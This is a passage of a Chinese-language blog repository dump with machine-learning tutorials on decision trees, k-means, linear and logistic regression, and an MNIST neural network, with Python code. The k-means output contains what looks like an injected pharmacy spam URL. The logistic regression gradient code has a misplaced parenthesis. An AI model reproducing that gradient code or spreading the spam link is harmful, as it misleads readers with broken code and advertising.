/image/syn-flood/syn-packet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/syn-packet.png -------------------------------------------------------------------------------- /image/syn-flood/tcp_header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/tcp_header.png -------------------------------------------------------------------------------- /machine-learning-decision-trees.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Decision Trees 2 | ================================ 3 | 4 | ### Decision Trees 5 |   决策树(Decision Trees)是用来做预测的比较常用的一个工具,设想一下,你收集了大量的商品浏览购买的信息,包括用户信息,用户浏览过的商品信息,商品价格,商品分类,商品标签,用户跳转过来的连接等等一系列毫不相关的数据,我们称之为特征。你有100亿条这种数据,然后你就可以根据某个特征将数据分为两个或者多个集合,然后再取特征再继续细分,直到无法再分为止,这样就形成了一棵决策树。怎么选取特征来做到最优的集合分割呢? 6 | 7 | ### Gini Impurity 8 |   基尼不纯度(Gini Impurity)是衡量标准之一。基尼不纯度衡量的是集合元素的聚类情况,当所有元素聚在一个分类的时候,基尼不纯度为0,值越大,表明分类越差。即,我们选取不同的特征进行集合分类,所得到的基尼不纯度越低,分类越准确。基尼不纯度计算方式如下: 9 |     10 | 11 | ### Entropy 12 |   Entropy(熵),entropy在统计学中用来衡量事件的不确定性。当熵值为0的时候表明事件是可以直接预测的,准确度为100%。同样,我们选取不同的特征来进行分类,所得到的熵值也是不同的,熵值越低,表明分类越准确。熵的计算公式如下: 13 |     14 | 15 | ### 例子 16 | ```python 17 | my_data=[ 18 | ['slashdot','USA','yes',18,'None'], 19 | ['google','France','yes',23,'Premium'], 20 | ['digg','USA','yes',24,'Basic'], 21 | ['kiwitobes','France','yes',23,'Basic'], 22 | ['google','UK','no',21,'Premium'], 23 | ['(direct)','New Zealand','no',12,'None'], 24 | ['(direct)','UK','no',21,'Basic'], 25 | ['google','USA','no',24,'Premium'], 26 | ['slashdot','France','yes',19,'None'], 27 | ['digg','USA','no',18,'None'], 28 | ['google','UK','no',18,'None'], 29 | ['kiwitobes','UK','no',19,'None'], 30 | ['digg','New Zealand','yes',12,'Basic'], 31 | ['slashdot','UK','no',21,'None'], 32 | ['google','UK','yes',18,'Basic'], 33 | ['kiwitobes','France','yes',19,'Basic'] 34 | ] 35 | ``` 36 |   以上是测试数据,根据其建立的决策树如下: 37 |     38 |   如果预测`['(direct)', 'USA', 'yes', 5]`的结果,流程如下: 39 |     40 | 41 |   这样细分的决策树会对数据有很大的偏向性,这时需要根据特征分类值来merge树叶,以1.0为例,修剪后的结果如下: 42 |     43 | 44 |   [代码 treepredict.py](https://github.com/linghuazaii/Machine-Learning/blob/master/decision_trees/treepredict.py) 45 | 46 | ### 后话 47 |   以决策树的方式做预测,容易理解也很好实现,当特征越多,数据越多的时候,预测才会越准确。如果不理解,可以想想分类后熵值或者基尼不纯度的变化,肯定是越来越小的。就好比那句话,“菩提本无树,明镜亦非台。本来无一物,何处惹尘埃。”一切皆有因果,我们虽然抓不到那条线,但是我们有数据呀,有历史呀,我想这就是统计学的真谛吧。 48 | 49 | ### Reference 50 | - [Decision tree learning](https://en.wikipedia.org/wiki/Decision_tree_learning) 51 | - [Programming Collective Intelligence](http://shop.oreilly.com/product/9780596529321.do) 52 | 53 | ### 小结 54 |   **GOOD LUCK, HAVE FUN!** 55 | -------------------------------------------------------------------------------- /machine-learning-euclidean-distance.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Euclidean Distance 2 | ==================================== 3 | 4 | ### Euclidean Distance 5 |   Euclidean Distance(欧几里得几何学距离),定义如下: 6 |      7 | 8 | ### Distance & Similarity 9 |   Euclidean Distance 可以被用来计算用户之间的相关性,相距越近的用户相关性越高。举个简单的例子:我看过“楚门的世界”,给了9分,也看过“肖生克的救赎”,给了9.8;你也看过这两部电影,并且给“楚门的世界”打了6分,给“肖生克的救赎”打了9分。那么我们之间的距离可以算出来,`distance = sqrt((9 - 6)^2 + (9.8 - 9)^2) = 3.104835`。为了体现距离越近,相似度越高,通过函数`f(x) = 1 / (1 + x)`转化一下: 10 |      11 |   由图可知,距离为0时,相似度为1,随着距离越大,相似度递减。 12 | 13 | ### 一个例子 14 | ```json 15 | { 16 | "Claudia Puig": { 17 | "Just My Luck": 3.0, 18 | "Snakes on a Plane": 3.5, 19 | "Superman Returns": 4.0, 20 | "The Night Listener": 4.5, 21 | "You, Me and Dupree": 2.5 22 | }, 23 | "Gene Seymour": { 24 | "Just My Luck": 1.5, 25 | "Lady in the Water": 3.0, 26 | "Snakes on a Plane": 3.5, 27 | "Superman Returns": 5.0, 28 | "The Night Listener": 3.0, 29 | "You, Me and Dupree": 3.5 30 | }, 31 | "Jack Matthews": { 32 | "Lady in the Water": 3.0, 33 | "Snakes on a Plane": 4.0, 34 | "Superman Returns": 5.0, 35 | "The Night Listener": 3.0, 36 | "You, Me and Dupree": 3.5 37 | }, 38 | "Lisa Rose": { 39 | "Just My Luck": 3.0, 40 | "Lady in the Water": 2.5, 41 | "Snakes on a Plane": 3.5, 42 | "Superman Returns": 3.5, 43 | "The Night Listener": 3.0, 44 | "You, Me and Dupree": 2.5 45 | }, 46 | "Michael Phillips": { 47 | "Lady in the Water": 2.5, 48 | "Snakes on a Plane": 3.0, 49 | "Superman Returns": 3.5, 50 | "The Night Listener": 4.0 51 | }, 52 | "Mick LaSalle": { 53 | "Just My Luck": 2.0, 54 | "Lady in the Water": 3.0, 55 | "Snakes on a Plane": 4.0, 56 | "Superman Returns": 3.0, 57 | "The Night Listener": 3.0, 58 | "You, Me and Dupree": 2.0 59 | }, 60 | "Toby": { 61 | "Snakes on a Plane": 4.5, 62 | "Superman Returns": 4.0, 63 | "You, Me and Dupree": 1.0 64 | } 65 | } 66 | ``` 67 |   以上是用户看过的电影,并打上的分值。 68 | ```json 69 | { 70 | "Claudia Puig": { 71 | "Gene Seymour": 0.2025519956555797, 72 | "Jack Matthews": 0.17411239489546831, 73 | "Lisa Rose": 0.252650308587072, 74 | "Michael Phillips": 0.17491720310721423, 75 | "Mick LaSalle": 0.21239994067041815, 76 | "Toby": 0.14923419446018063 77 | }, 78 | "Gene Seymour": { 79 | "Claudia Puig": 0.2025519956555797, 80 | "Jack Matthews": 0.38742588672279304, 81 | "Lisa Rose": 0.29429805508554946, 82 | "Michael Phillips": 0.1896812679802183, 83 | "Mick LaSalle": 0.27792629762666365, 84 | "Toby": 0.15776505912784203 85 | }, 86 | "Jack Matthews": { 87 | "Claudia Puig": 0.17411239489546831, 88 | "Gene Seymour": 0.38742588672279304, 89 | "Lisa Rose": 0.2187841884486319, 90 | "Michael Phillips": 0.19636040545626823, 91 | "Mick LaSalle": 0.23800671553691075, 92 | "Toby": 0.1652960191502465 93 | }, 94 | "Lisa Rose": { 95 | "Claudia Puig": 0.252650308587072, 96 | "Gene Seymour": 0.29429805508554946, 97 | "Jack Matthews": 0.2187841884486319, 98 | "Michael Phillips": 0.1975496259559987, 99 | "Mick LaSalle": 0.4142135623730951, 100 | "Toby": 0.15954492995986427 101 | }, 102 | "Michael Phillips": { 103 | "Claudia Puig": 0.17491720310721423, 104 | "Gene Seymour": 0.1896812679802183, 105 | "Jack Matthews": 0.19636040545626823, 106 | "Lisa Rose": 0.1975496259559987, 107 | "Mick LaSalle": 0.23582845781094, 108 | "Toby": 0.16462407202206505 109 | }, 110 | "Mick LaSalle": { 111 | "Claudia Puig": 0.21239994067041815, 112 | "Gene Seymour": 0.27792629762666365, 113 | "Jack Matthews": 0.23800671553691075, 114 | "Lisa Rose": 0.4142135623730951, 115 | "Michael Phillips": 0.23582845781094, 116 | "Toby": 0.16879264089884097 117 | }, 118 | "Toby": { 119 | "Claudia Puig": 0.14923419446018063, 120 | "Gene Seymour": 0.15776505912784203, 121 | "Jack Matthews": 0.1652960191502465, 122 | "Lisa Rose": 0.15954492995986427, 123 | "Michael Phillips": 0.16462407202206505, 124 | "Mick LaSalle": 0.16879264089884097 125 | } 126 | } 127 | ``` 128 |   以上是算出的用户相似度。 129 |   [源码](https://github.com/linghuazaii/Machine-Learning/tree/master/recommendation) 130 | 131 | ### 小结 132 |   **GOOD LUCK, HAVE FUN!** 133 | -------------------------------------------------------------------------------- /machine-learning-k-means.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]K-Means 2 | ========================== 3 | 4 | ### K-means 5 |   上一篇介绍了Word Vector,其有一个很明显的缺点,就是数据量太大的时候,运算量是非常惊人的。本章介绍K-means,K-means的原理比较简单。举个例子,我们要将50个新闻RSS FEED分成K个类别的话,只需要生成5个随机的Vector,然后分别将50个RSS FEED与5个随机的Vector求Pearson距离,这一轮的最终结果会将所有RSS FEED归为5个类别。所谓means就是中值嘛,然后去5个分组的中值作为5个新的Vector,再次计算距离归类。循环以上迭代,直到得到的分组不再变化。如图: 6 |     7 | 8 | ### 例子 9 | [k_means_cluster.py](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/k_means_cluster.py) 10 | ```python 11 | #!/bin/env python 12 | # -*- coding: utf-8 -*- 13 | # This file is auto-generated.Edit it at your own peril. 14 | from math import sqrt 15 | import random 16 | 17 | def readfile(filename): 18 | lines = [line for line in file(filename)] 19 | colnames = lines[0].strip().split('\t')[1:] 20 | rownames = [] 21 | data = [] 22 | for line in lines[1:]: 23 | p = line.strip().split('\t') 24 | rownames.append(p[0]) 25 | data.append([float(i) for i in p[1:]]) 26 | 27 | return rownames, colnames, data 28 | 29 | def pearson(v1, v2): 30 | sum1 = sum(v1) 31 | sum2 = sum(v2) 32 | 33 | sum1Sq = sum([pow(v, 2) for v in v1]) 34 | sum2Sq = sum([pow(v, 2) for v in v2]) 35 | 36 | pSum = sum([v1[i] * v2[i] for i in range(len(v1))]) 37 | num = pSum - (sum1 * sum2 / len(v1)) 38 | den = sqrt((sum1Sq - pow(sum1, 2) / len(v1)) * (sum2Sq - pow(sum2, 2) / len(v1))) 39 | if den == 0: 40 | return 0 41 | 42 | return 1.0 - num / den 43 | 44 | def kcluster(rows, distance = pearson, k = 7): 45 | ranges = [(min([row[i] for row in rows]), max([row[i] for row in rows])) for i in range(len(rows[0]))] 46 | # Create k random centroids 47 | clusters = [[random.random() * (ranges[i][1] - ranges[i][0]) + ranges[i][0] for i in range(len(rows[0]))] for j in range(k)] 48 | 49 | last_matches = None 50 | for t in range(100): 51 | print 'Iteration %d' % t 52 | best_matches = [[] for i in range(k)] 53 | 54 | for j in range(len(rows)): 55 | row = rows[j] 56 | best_match = 0 57 | for i in range(k): 58 | d = distance(clusters[i], row) 59 | if d < distance(clusters[best_match], row): 60 | best_match = i 61 | best_matches[best_match].append(j) 62 | 63 | if best_matches == last_matches: 64 | break 65 | last_matches = best_matches 66 | 67 | for i in range(k): 68 | avgs = [0.0] * len(rows[0]) 69 | if len(best_matches[i]) > 0: 70 | for row_id in best_matches[i]: 71 | for m in range(len(rows[row_id])): 72 | avgs[m] += rows[row_id][m] 73 | for j in range(len(avgs)): 74 | avgs[j] /= len(best_matches[i]) 75 | clusters[i] = avgs 76 | 77 | return best_matches 78 | 79 | def print_cluster(clusters, blognames): 80 | for i in range(len(clusters)): 81 | print "{" 82 | for j in clusters[i]: 83 | print "\t%s," % blognames[j] 84 | print "}" 85 | 86 | 87 | def create_cluster(): 88 | blognames, words, data = readfile('blogdata.txt') 89 | kclust = kcluster(data) 90 | print_cluster(kclust, blognames) 91 | 92 | 93 | def main(): 94 | create_cluster() 95 | 96 | if __name__ == "__main__": 97 | main() 98 | ``` 99 | 100 | **Result**: 101 | ``` 102 | { 103 | sites.google.com/view/kamagratablette/, 104 | BBC News - Technology, 105 | David Kleinert Photography, 106 | Techlearning RSS Feed, 107 | } 108 | { 109 | NASA Image of the Day, 110 | } 111 | { 112 | ASCD SmartBrief, 113 | CBNNews.com, 114 | GANNETT Syndication Service, 115 | } 116 | { 117 | Reuters: U.S., 118 | NYT > Home Page, 119 | News : NPR, 120 | Reuters: Top News, 121 | Reuters: World News, 122 | } 123 | { 124 | Education : NPR, 125 | Technology : NPR, 126 | WIRED, 127 | UEN News, 128 | } 129 | { 130 | Nature - Issue - nature.com science feeds, 131 | NOVA | PBS, 132 | Latest Science News -- ScienceDaily, 133 | Resources » Surfnetkids, 134 | Movies : NPR, 135 | Utah.gov News Provider, 136 | PCWorld, 137 | BBC News - Business, 138 | The Daily Puppy | Pictures of Puppies, 139 | Animal of the day, 140 | Latest News Articles from Techworld, 141 | Utah Jazz, 142 | Dictionary.com Word of the Day, 143 | Macworld, 144 | } 145 | { 146 | FRONTLINE - Latest Stories, 147 | Utah - The Salt Lake Tribune, 148 | Utah, 149 | Arts & Life : NPR, 150 | BBC News - US & Canada, 151 | Latest News, 152 | AP Top Science News at 6:06 a.m. EDT, 153 | BBC News - Home, 154 | Fresh Air : NPR, 155 | NYT > Sports, 156 | AP Top Sports News at 2:56 a.m. EDT, 157 | CNN.com - RSS Channel - HP Hero, 158 | KSL / Utah / Local Stories, 159 | AP Top U.S. News at 3:16 a.m. EDT, 160 | NYT > Technology, 161 | Yahoo News - Latest News & Headlines, 162 | } 163 | ``` 164 |   得出的结果并不太准确~ 165 | 166 | ### Reference 167 | - [Programming Collective Intelligence](http://shop.oreilly.com/product/9780596529321.do) 168 | 169 | ### 小结 170 |   **GOOD LUCK,HAVE FUN!** 171 | -------------------------------------------------------------------------------- /machine-learning-linear-regression-calculation.md: -------------------------------------------------------------------------------- 1 | Linear Regression矩阵计算 2 | ========================= 3 | 4 | # 前言 5 |   在Coursera里,Andrew NG直接给定了Linear Regression的矩阵计算方法,但是并没有给出证明,这里做一个简单的推理。 6 | 7 | # Linear Regression的历史 8 |   早在十九世纪初,Gauss就发不了一篇论文 - [method of least squares](https://en.wikipedia.org/wiki/Least_squares),根据Gauss的公式一步步推导,就是Linear Regression,如下: 9 |   10 |   关于矩阵导数的求法,请参阅:[Matrix Differentiation](http://www.atmos.washington.edu/~dennis/MatrixCalculus.pdf) 11 |   其中求出的矩阵θ就是训练的出model,是一个`p x 1`的矩阵,做预测的话 `y = Xθ`即可求得所有预测结果值。 12 |   算下训练时间复杂度就是`max(O(n*p), O(p^3))`,所以当数据的特征并不多的时候,举个例子,特征为10000个的话,计算量级也就10^12,而且一般做个性化推荐也好,搜索也好,很难有这么多特征,所以直接矩阵运算比较快,也比较方便。特征非常多的时候就用上一篇[博文](https://github.com/linghuazaii/blog/wiki/Linear-Regression%28%E7%BA%BF%E6%80%A7%E5%9B%9E%E5%BD%92%29)里介绍的方法迭代就好。 13 | 14 | 15 | # 小结 16 | **GOOD LUCK, HAVE FUN!** 17 | -------------------------------------------------------------------------------- /machine-learning-linear-regression.md: -------------------------------------------------------------------------------- 1 | Linear Regression(线性回归) 2 | ========================== 3 | 4 | # 前言 5 |   本文所有测试数据来自于[Kaggle](https://www.kaggle.com/),图形使用[matplotlib](https://matplotlib.org)绘制,数学公式来自于[hostmath](http://www.hostmath.com/) 6 | 7 | # Linear Regression 8 |   在统计学上,线性回归被用来对一个独立标量y和多个独立变量x1, x2, x3 ...之间联系建立线性模型。在推荐系统里,用来建模做预测。比如说一个卖房子的网站,将房子的信息抽象成许多特征,其中包括房子价格,如果给定一个房子需要预测价格的话, 其中价格就是y,其他特征就是x1, x2, x3 ... 先看一个简单的例子,只有一个特征。 9 | 10 | # Simple Linear Regression 11 |   先看如下数据: 12 |  [train.csv](https://github.com/linghuazaii/Machine-Learning/blob/master/linear_regression/train.csv) 13 |   14 |   现在需要根据这组数据求出y和x的关系函数,先了解一下[Mean Squared Error](https://en.wikipedia.org/wiki/Mean_squared_error) 15 | 16 | # Mean Squared Error 17 |   [Mean Squared Error](https://en.wikipedia.org/wiki/Mean_squared_error), 在统计学上用来衡量估算函数的质量。如上例子,可知估算函数是一个线性函数,如下: 18 |   19 |   MSE的计算函数如下: 20 |   21 |   MSE的值越小,表示该估算函数越准确,以上多出来的`1/2`是为了便于做Gradient Descent。那么怎样调整θ的值使得MSE的值最小呢?先看一个简单的例子。 22 | 23 | # 例子 24 |   如下例子,我们给出`y = x`上的三个点,不同的θ值得到的MSE的值是怎样的呢? 25 |   26 |   MSE值如图,图中的cost即为MSE: 27 |   28 |   这是cost和θ取值的关系图,可知θ取1的时候,MSE最小,即求`d(MSE) / d(θ) = 0`时θ的值,但是电脑只会计算,不会解方程,而且`y = kx + b`会让问题变得更复杂,这样就有了一个方法去计算参数的值: [Gradient Descent](https://en.wikipedia.org/wiki/Gradient_descent). 29 | 30 | # Gradient Descent 31 |   [Gradient Descent](https://en.wikipedia.org/wiki/Gradient_descent)是一个通过不断迭代的方式去求函数极值的算法。对于: 32 |   33 |   其中α表示learning rate,这样就可以通过不断调整θ的值使得`d(MSE) / d(θ) = 0`,最终`θ(n) = θ(n) - 0 = θ(n)`,求出了MSE的极小值,同时也得到了`θ(n)`的值。由于`θ(1...n)`是彼此独立的,所以写代码的时候注意每一次迭代,他们的值根据上一次的迭代结果计算。关于learning rate,控制着每一步gradient descent的步长,如果learning rate过大,得到的结果是这样的: 34 |   35 |   迭代求得的倒数越来越大,最终得到的全是`inf`,得不到极小值。 36 | 37 | # 本例 38 |   对于本例,估算函数和Gradient Descent是这样的: 39 |   40 |   代码如下: 41 | ```python 42 | # cost 函数,即 MSE 43 | def cost(data, fx, k, b): 44 | cost_val = Decimal(0.0) 45 | for point in data: 46 | cost_val += pow(fx(k, b, point[0]) - point[1], 2) 47 | cost_val /= 2 * len(data) 48 | return cost_val 49 | 50 | # d(cost) / d(k) 51 | def derivate_k(data, fx, k, b): 52 | d = Decimal(0.0) 53 | for point in data: 54 | d += fx(k, b, point[0]) - point[1] 55 | d /= len(data) 56 | return d 57 | 58 | # d(cost) / d(b) 59 | def derivate_b(data, fx, k, b): 60 | d = Decimal(0.0) 61 | for point in data: 62 | d += (fx(k, b, point[0]) - point[1]) * point[0] 63 | d /= len(data) 64 | return d 65 | 66 | # loop 直到cost值的变化趋向于一个非常小的值 67 | def calc_line_function(data, learn_rate): 68 | ''' 69 | cost = 1/(2m) * E(1->m)(Y(i) - y(i))^2 70 | Y(i) = k + b * x(i) 71 | cost(k)' = d(cost)/d(k) = 1/m * E(1->m)(Y(i) - y(i)) 72 | cost(b)' = d(cost)/d(b) = 1/m * E(1->m)((Y(i) - y(i)) * x(i)) 73 | for gradient descent, a means learning rate. 74 | update k: 75 | k = k - a * cost(k)' 76 | b = b - a * cost(b)' 77 | ''' 78 | k = Decimal(0.0) 79 | b = Decimal(0.0) 80 | a = Decimal(learn_rate) 81 | fx = lambda m, n, x: (m + n * x) 82 | last_cost = cost(data, fx, k, b) 83 | while True: 84 | new_k = k - a * derivate_k(data, fx, k, b) 85 | new_b = b - a * derivate_b(data, fx, k, b) 86 | k = new_k 87 | b = new_b 88 | new_cost = cost(data, fx, k, b) 89 | #print "k:%s b:%s %s" % (k, b, math.fabs(new_cost - last_cost)) 90 | print "k:%s b:%s %s" % (k, b, new_cost) 91 | if math.fabs(new_cost - last_cost) <= 0.0001: 92 | return k, b 93 | last_cost = new_cost 94 | ``` 95 |   本例所得结果如图: 96 |   97 |   所有代码见 [linear regression code](https://github.com/linghuazaii/Machine-Learning/tree/master/linear_regression) 98 | 99 | # Reference 100 | - [Andrew NG Coursera](https://www.coursera.org/learn/machine-learning/home/welcome) 101 | 102 | # More 103 |   Gradient Descent求得的值是局部最优解,并非全局最优解。 104 |   对于linear regression,`y = k*x + b`的情况,`cost(k, b)`是一个三维的图,对于更多的变量,则维度更高,无法呈现。如图,即bowl-shape: 105 |   106 |   你可能会问,如果图是这样的,那么得到的只是局部最优解,但是对于linear regression,都是bowl-shape,即这个局部最优解,就是全局最优解: 107 |   108 |   针对上图,如果要获得全局最优解也是有办法的,以前的博文里也有说过,即[Simulated Annealing](https://en.wikipedia.org/wiki/Simulated_annealing) 109 | 110 | # 小结 111 |   有例子和代码能给人更直观的感受,只看是没多大用的。**GOOD LUCK,HAVE FUN!** 112 | -------------------------------------------------------------------------------- /machine-learning-logistic-regression.md: -------------------------------------------------------------------------------- 1 | Andrew NG. Logistic Regression小结与示例 2 | ======================================== 3 | 4 | ### Logistics Regression 5 |   在统计学上,Logistics Regression的例子有不少,虽然叫Regression,其实是Supervise Classification。举个教科书上经常举的例子,就是给定一堆肿瘤的数据,然后根据这些数据去预测未来的肿瘤是良性还是恶性。再具体一点比如说肿瘤的大小,患者年龄,肿瘤良性/恶性,给定肿瘤大小和患者年龄,如何预测肿瘤是良性还是恶性的问题。这就属于一个classification的问题。看下图: 6 |   7 |   数据有三个特征,`grade1`, `grade2`, 以及`positive/negative`,Logistics Regression就是用来将数据进行分类,找boundary。 8 | 9 | ### 理论 10 |   和Linear Regression不同的是,我们的`h(x)`变了。因为预测结果只有0和1,`h(x)`如下: 11 | 12 |   这个是`g(x) = 1 / (1 + e^-x)`的图像: 13 |   14 |   Cost函数的倒数如下: 15 |   16 |   和Linear Regression的倒数一样,但是不可以通过`(X'X)^-1X'Y`的方式计算β数组。证明过程见:[derivative of cost function for Logistic Regression](https://math.stackexchange.com/questions/477207/derivative-of-cost-function-for-logistic-regression). 17 |   由于选择不同的训练模型得到的结论还是差距很大的,而且现实生活中不像例子一样可以很直观的通过图像去感受,由于特征过多,而且选取也不同,所以就有了Regularized Logistics Regression,它的Cost函数如下: 18 |   19 |   倒数如下: 20 |   21 | 22 | ### 具体的例子 23 |   给定一组测试数据[data.csv](https://github.com/linghuazaii/Machine-Learning/blob/master/logistic_regression/data.csv),由于R画图比较方便省事,所以我们先用R看一下数据的整体分布,然后再整Python代码。如果你的R没有安装`lattice`包,可以先装一个: 24 | ```r 25 | install.packages('lattice') 26 | ``` 27 |   我也不了解R,它的各种plot库非常繁杂,这个库也是我随便找的一个,然后plot数据。 28 | ```r 29 | require('lattice') 30 | data = read.csv('data.csv', header=TRUE) 31 | attach(data) 32 | xyplot(grade1 ~ grade2, data, groups = label, pch = 20) 33 | ``` 34 |   数据分布如下图: 35 |   36 |   可以看出可以近似通过一条直线来分割曲线,这样的话训练模型为`f(x) = a + bx1 + cx2`,其实这条线还是有一个弧度的,所以也可以去训练模型为`f(x) = a + bx1 + cx2 + dx1x2`,这样分类更加准确,但是可能引起overfit的问题,我们通过调整λ值来微调。本例两种模型都实现了。 37 | 38 | ### 代码 39 | load数据 40 | ```python 41 | def load_data(data_file): 42 | data = np.loadtxt(open(data_file, 'rb'), delimiter = ',', skiprows = 1, usecols = (1,2,3)) 43 | X = data[:, 0:2] 44 | #以下注释掉的行在做f(x) = a + bx1 + cx2 + dx1x2x训练的时候需要注掉 45 | #X = np.append(X, np.reshape(X[:,0] * X[:,1], (X.shape[0], 1)), axis = 1) 46 | Y = data[:, 2] 47 | Y = np.reshape(Y, (Y.shape[0], 1)) 48 | return X, Y 49 | ``` 50 | 51 | `sigmoid`函数 52 | ```python 53 | # 因为有一个log(0)的问题所以给0一个近似的极小值 54 | def sigmoid(x): 55 | rs = 1.0 / (1.0 + np.exp(-x)) 56 | for (i, j), value in np.ndenumerate(rs): 57 | if value < 1.0e-10: 58 | rs[i][j] = 1.0e-10 59 | elif value > 1.0 - 1.0e-10: 60 | rs[i][j] = 1.0 - 1.0e-10 61 | return rs 62 | ``` 63 | 64 | `cost`函数 65 | ```python 66 | # 在做f(x) = a + bx1 + cx2 + dx1x2x训练的时候需要去掉以下的所有注释 67 | def cost(theta, x, y, lam = 0.): 68 | m = x.shape[0] 69 | theta = np.reshape(theta, (len(theta), 1)) 70 | #lamb = theta.copy() 71 | #lamb[0][0] = 0. 72 | J = (-1.0 / m) * (y.T.dot(np.log(sigmoid(x.dot(theta)))) + (1 - y).T.dot(np.log(1 - sigmoid(x.dot(theta)))))# + lam / (2 * m) * lamb.T.dot(lamb) 73 | return J[0][0] 74 | ``` 75 | 76 | `gradient`函数 77 | ```python 78 | # 在做f(x) = a + bx1 + cx2 + dx1x2x训练的时候需要去掉以下的所有注释 79 | def grad(theta, x, y, lam = 0.): 80 | m = x.shape[0] 81 | theta = np.reshape(theta, (len(theta), 1)) 82 | #lamb = theta.copy() 83 | #lamb[0][0] = 0. 84 | grad = (1.0 / m) * (x.T.dot(sigmoid(x.dot(theta) - y)))# + (lam / m) * lamb 85 | grad = grad.flatten() 86 | return grad 87 | ``` 88 | 89 | 计算最优解 90 | ```python 91 | # 在做f(x) = a + bx1 + cx2 + dx1x2x训练的时候, theta = np.random.randn(4) 92 | theta = np.random.randn(3) 93 | X_new = np.append(np.ones((X.shape[0], 1)), X, axis = 1) 94 | theta_final = opt.fmin_tnc(cost, theta, fprime = grad, args = (X_new, Y), approx_grad = True, epsilon = 0.001, maxfun = 10000) 95 | ``` 96 | 97 |   `f(x) = a + bx1 + cx2)`训练的结果如下: 98 |   99 |   `f(x) = a + bx1 + cx2 + dx1x2x`,`λ = 0.`时训练结果如下: 100 |   101 |   `λ = 0.1`时训练结果如下: 102 |   103 |   `λ = 2.0`时训练结果如下: 104 |   105 |   `λ = 3.0`时训练结果如下: 106 |   107 |   `λ = 4.0`时训练结果如下: 108 |   109 |   `λ = 8.0`时训练结果如下: 110 |   111 |   `λ = 16.0`时训练结果如下: 112 |   113 |   你可以将这几张图片下载到电脑上浏览,这样对不同的λ取值导致overfit和underfit会有一个很直观的感受。 114 | 115 |   [所有代码见Source Code](https://github.com/linghuazaii/Machine-Learning/tree/master/logistic_regression) 116 | 117 | ### 小结 118 | **GOOD LUCK, HAVE FUN!** 119 | -------------------------------------------------------------------------------- /machine-learning-neural-networks-digit-recognition.md: -------------------------------------------------------------------------------- 1 | Neural Networks Backpropagation做MNIST数字识别 2 | ============================================== 3 | 4 | ### Neural Networks 5 |   不同种属的生物大脑所含有的神经元数量有着显著的不同,一个成年人的大脑约含有850亿~860亿神经元,其中163亿位于大脑皮质,690亿位于小脑。相比而言,[秀丽隐杆线虫线虫](https://en.wikipedia.org/wiki/Caenorhabditis_elegans)仅仅只有302个神经元,而[黑腹果蝇](https://en.wikipedia.org/wiki/Drosophila_melanogaster)则有约100000神经元,并且能表现出比较复杂的行为。本例所使用的神经元数量大约只有1000个,三层神经网络,只有一层hidden layer。 6 |   对于人的大脑来说,不同的部分之间具有通用性,一个有语言障碍的人,负责语言部分的大脑会适应于其他部分的行为。就好比有的聋哑人视觉会比较好,有的瞎子听觉却比常人更好,其原因就是他们的缺陷导致相应的大脑部位去适应另外的能力。 7 |   神经元的行为非常复杂,我们只抽象出我们所能理解的比较简单的一部分,但是Neural Networks的对不同问题领域的适应能力和学习能力还是保留了的。一个神经元简化为树突,对应input,胞体对应`f(x)`,早期Perceptron神经元设计比较简单,`f(x) = b + W*X`,局限性比较大,只能输出`0`和`1`,不过能实现所有的门电路逻辑。后来发展为sigmoid神经元,`f(x) = 1 / (1 + e^-(W*X + b))`,输出是一个平滑的从0到1的S曲线。然后轴突对应output。神经元在输入达到一个阈值的时候才会被激发,这样通过动态调整weights和biases来控制Neural Networks的神经元行为进而学习一个问题领域。下面是一个简单的神经网络,input layer拥有784个神经元,hidden layer有15个神经元,output layer有10个神经元: 8 |    9 | 10 | ### Weights And Biases 11 |   对于上图,如果我们有M个training data,则一次正向的传导为`sigmoid(W2 * sigmoid(W1 * R^(M*784) + b1) + b2)`,最终得到`R^(M*10)`的output矩阵,然后计算Cost,然后多次迭代得到优化后的Weights和Biases。本例用上篇提到的Stochastic Gradient Descent去找优化的解。 12 | 13 | ### Backpropagation 14 |   下面是Backpropagation的公式,我们来一一推导: 15 |    16 |    17 | 18 | ### MNIST 19 |   [MNIST](http://yann.lecun.com/exdb/mnist/)包含手写的数字,有60000条training data,10000条test data。下面的图片提取自MNIST: 20 |    21 |   22 |   23 |   24 |   25 |   26 |   27 |   28 |   29 |   30 |   31 |  提取training data 32 | ```python 33 | def load_train_data(): 34 | fimg = gzip.open('train-images-idx3-ubyte.gz', 'rb') 35 | flabel = gzip.open('train-labels-idx1-ubyte.gz', 'rb') 36 | magic_img, total_img, rows, cols = struct.unpack('>IIII', fimg.read(16)) 37 | magic_label, total_label = struct.unpack('>II', flabel.read(8)) 38 | train_data = list() 39 | for i in xrange(total_img): 40 | img = np.reshape(np.fromstring(fimg.read(rows * cols), dtype = np.uint8), (rows * cols, 1)) 41 | train_data.append(img) 42 | train_label = vectorize_result(np.fromstring(flabel.read(total_label), dtype = np.uint8)) 43 | train = zip(train_data, train_label) 44 | 45 | fimg.close() 46 | flabel.close() 47 | 48 | return train 49 | ``` 50 | 51 |  提取test data 52 | ```python 53 | def load_test_data(): 54 | fimg = gzip.open('t10k-images-idx3-ubyte.gz', 'rb') 55 | flabel = gzip.open('t10k-labels-idx1-ubyte.gz', 'rb') 56 | magic_img, total_img, rows, cols = struct.unpack('>IIII', fimg.read(16)) 57 | magic_label, total_label = struct.unpack('>II', flabel.read(8)) 58 | test_data = list() 59 | for i in xrange(total_img): 60 | img = np.reshape(np.fromstring(fimg.read(rows * cols), dtype = np.uint8), (rows * cols, 1)) 61 | test_data.append(img) 62 | test_label = np.fromstring(flabel.read(total_label), dtype = np.uint8) 63 | test = zip(test_data, test_label) 64 | 65 | fimg.close() 66 | flabel.close() 67 | 68 | return test 69 | ``` 70 | 71 | ### Neural Networks & Backpropagation 72 |  定义Neural Network 73 | ```python 74 | class NeuralNetwork(object): 75 | def __init__(self, sizes): 76 | self.num_layers = len(sizes) 77 | self.sizes = sizes 78 | self.biases = [np.random.randn(y, 1) for y in sizes[1:]] 79 | self.weights = [np.random.randn(y, x) for x, y in zip(sizes[:-1], sizes[1:])] 80 | ``` 81 | 82 |  sigmoid函数和导数 83 | ```python 84 | def sigmoid(z): 85 | for (x, y), val in np.ndenumerate(z): 86 | if val >= 